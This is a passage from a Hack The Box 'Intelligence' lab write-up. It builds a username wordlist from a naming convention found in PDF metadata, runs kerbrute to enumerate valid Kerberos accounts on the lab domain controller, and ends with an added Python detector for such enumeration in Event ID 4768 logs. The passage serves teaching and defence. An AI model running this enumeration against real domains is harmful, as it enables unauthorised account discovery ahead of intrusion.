User Naming Convention
The 2 PDF files available from the target web server revealed 2 potential domain usernames in the Creator field of the metadata:
William.Lee
Jose.Williams
This suggests the naming convention that the target domain uses for other users: <FIRSTNAME>.<LASTNAME>
I will attempt to create a list of potential usernames following the discovered naming convention, to perform an additional brute-force attack against the target KDC.
Wordlist
┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ python3 ~/Tools/username_generator.py
Choose username format:
1) hsimpson
2) h.simpson
3) homersimpson
4) homer.simpson
5) hjsimpson
6) homerjsimpson
7) homerjaysimpson
8) homersimpsonb
Option: 4
Mail domain (example: ...@domain.com) [Default: none]:
Domain (example: domain\...) [Default: none]:
Names file path: /usr/share/wordlists/seclists/Usernames/Names/names-usa-top2000.txt
Surnames file path: /usr/share/wordlists/seclists/Usernames/Names/familynames-usa-top1000.txt
Output file [Default: results.txt]: /home/kali/archive/htb/labs/intelligence/potential_usernames.txt
Output saved in /home/kali/archive/htb/labs/intelligence/potential_usernames.txt
Using a custom Python script, I generated a wordlist containing potential usernames: potential_usernames.txt
┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ wc -l potential_usernames.txt
2000000 potential_usernames.txt
It contains 2 million arbitrary usernames. This would take too much time to go through.
Username Extraction
┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ kerbrute userenum --dc dc.intelligence.htb -d INTELLIGENCE.HTB ./potential_usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
version: v1.0.3 (9dad6e1) - 09/26/23 - Ronnie Flathers @ropnop
2023/09/26 15:29:16 > Using KDC(s):
2023/09/26 15:29:16 > dc.intelligence.htb:88
2023/09/26 15:31:13 > [+] VALID USERNAME: RICHARD.WILLIAMS@INTELLIGENCE.HTB
2023/09/26 15:31:14 > [+] VALID USERNAME: JOSE.WILLIAMS@INTELLIGENCE.HTB
2023/09/26 15:36:06 > [+] VALID USERNAME: DAVID.WILSON@INTELLIGENCE.HTB
2023/09/26 15:40:29 > [+] VALID USERNAME: JENNIFER.THOMAS@INTELLIGENCE.HTB
2023/09/26 15:42:58 > [+] VALID USERNAME: DARRYL.HARRIS@INTELLIGENCE.HTB
2023/09/26 15:51:40 > [+] VALID USERNAME: WILLIAM.LEE@INTELLIGENCE.HTB
2023/09/26 15:52:09 > [+] VALID USERNAME: LAURA.LEE@INTELLIGENCE.HTB
2023/09/26 15:53:37 > [+] VALID USERNAME: THOMAS.HALL@INTELLIGENCE.HTB
2023/09/26 15:56:02 > [+] VALID USERNAME: STEPHANIE.YOUNG@INTELLIGENCE.HTB
2023/09/26 15:58:28 > [+] VALID USERNAME: JASON.WRIGHT@INTELLIGENCE.HTB
2023/09/26 16:01:24 > [+] VALID USERNAME: SCOTT.SCOTT@INTELLIGENCE.HTB
2023/09/26 16:04:19 > [+] VALID USERNAME: BRIAN.BAKER@INTELLIGENCE.HTB
2023/09/26 16:10:41 > [+] VALID USERNAME: ANITA.ROBERTS@INTELLIGENCE.HTB
2023/09/26 16:15:03 > [+] VALID USERNAME: TRAVIS.EVANS@INTELLIGENCE.HTB
2023/09/26 16:19:52 > [+] VALID USERNAME: BRIAN.MORRIS@INTELLIGENCE.HTB
2023/09/26 16:21:49 > [+] VALID USERNAME: DAVID.REED@INTELLIGENCE.HTB
2023/09/26 16:28:19 > [+] VALID USERNAME: SAMUEL.RICHARDSON@INTELLIGENCE.HTB
2023/09/26 16:46:46 > [+] VALID USERNAME: JOHN.COLEMAN@INTELLIGENCE.HTB
2023/09/26 16:47:39 > [+] VALID USERNAME: JOHN.COLEMAN@INTELLIGENCE.HTB
2023/09/26 16:50:48 > [+] VALID USERNAME: KELLY.LONG@INTELLIGENCE.HTB
2023/09/26 16:51:12 > [+] VALID USERNAME: KELLY.LONG@INTELLIGENCE.HTB
2023/09/26 16:51:40 > [+] VALID USERNAME: JASON.PATTERSON@INTELLIGENCE.HTB
2023/09/26 17:33:17 > [+] VALID USERNAME: JOEL.CRAWFORD@INTELLIGENCE.HTB
2023/09/26 18:09:08 > [+] VALID USERNAME: DANNY.MATTHEWS@INTELLIGENCE.HTB
2023/09/26 18:17:01 > [+] VALID USERNAME: IAN.DUNCAN@INTELLIGENCE.HTB
^c
I stopped the brute-force attack with kerbrute about an hour later, as it had reached only about 15% of the 2 million potential users. Despite the early abort, 23 valid domain users have been identified.
┌──(kali㉿kali)-[~/archive/htb/labs/intelligence]
└─$ cat dummy | cut -d '@' -f1 | cut -d ':' -f4 | tr -d '[:blank:]' | tr '[:upper:]' '[:lower:]' > users_from_naming_convention.txt
The raw output is saved to the dummy file to be sorted and saved to the users_from_naming_convention.txt file.
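The enumeration above is visible on the domain controller: with failure auditing enabled for the Kerberos Authentication Service, a TGT request for a nonexistent principal is logged as Event ID 4768 with result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN). The following is an added example, not part of the original write-up, that flags sources requesting TGTs for many distinct unknown accounts in a short window; the comma-separated export layout, the IP addresses, the thresholds and the sample events are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime

PRINCIPAL_UNKNOWN = "0x6"  # KDC_ERR_C_PRINCIPAL_UNKNOWN

# Constructed sample (assumed export layout):
# timestamp,event_id,source_ip,account,result_code
SAMPLE_EVENTS = """\
2023-09-26T15:29:16,4768,192.0.2.10,aaron.smith,0x6
2023-09-26T15:29:16,4768,192.0.2.10,aaron.johnson,0x6
2023-09-26T15:29:17,4768,192.0.2.10,aaron.williams,0x6
2023-09-26T15:29:17,4768,192.0.2.10,aaron.brown,0x6
2023-09-26T15:29:18,4768,192.0.2.10,aaron.jones,0x6
2023-09-26T15:29:18,4768,192.0.2.10,aaron.garcia,0x6
2023-09-26T15:30:02,4768,198.51.100.7,jose.wiliams,0x6
2023-09-26T15:30:20,4768,198.51.100.7,jose.williams,0x0
2023-09-26T15:31:00,4624,198.51.100.7,jose.williams,0x0
"""

def parse(text):
    """Yield (timestamp, source_ip, account, result_code) for 4768 events only."""
    for line in text.strip().splitlines():
        ts, event_id, ip, account, code = line.split(",")
        if event_id == "4768":
            yield datetime.fromisoformat(ts), ip, account.lower(), code.lower()

def detect_enumeration(text, window_s=300, threshold=5):
    """Return {source_ip: max distinct unknown principals seen in any window}
    for sources that reach `threshold` distinct unknown names within `window_s`."""
    by_ip = defaultdict(list)
    for ts, ip, account, code in parse(text):
        if code == PRINCIPAL_UNKNOWN:
            by_ip[ip].append((ts, account))
    alerts = {}
    for ip, hits in by_ip.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            # Slide the window start forward until it spans at most window_s.
            while (hits[end][0] - hits[start][0]).total_seconds() > window_s:
                start += 1
            names = {account for _, account in hits[start:end + 1]}
            if len(names) >= threshold:
                alerts[ip] = max(alerts.get(ip, 0), len(names))
    return alerts

if __name__ == "__main__":
    for ip, count in detect_enumeration(SAMPLE_EVENTS).items():
        print(f"possible Kerberos user enumeration from {ip}: {count} unknown principals")
```

A single mistyped username from a workstation stays below the threshold, while a wordlist run produces distinct unknown principals far faster than any legitimate client.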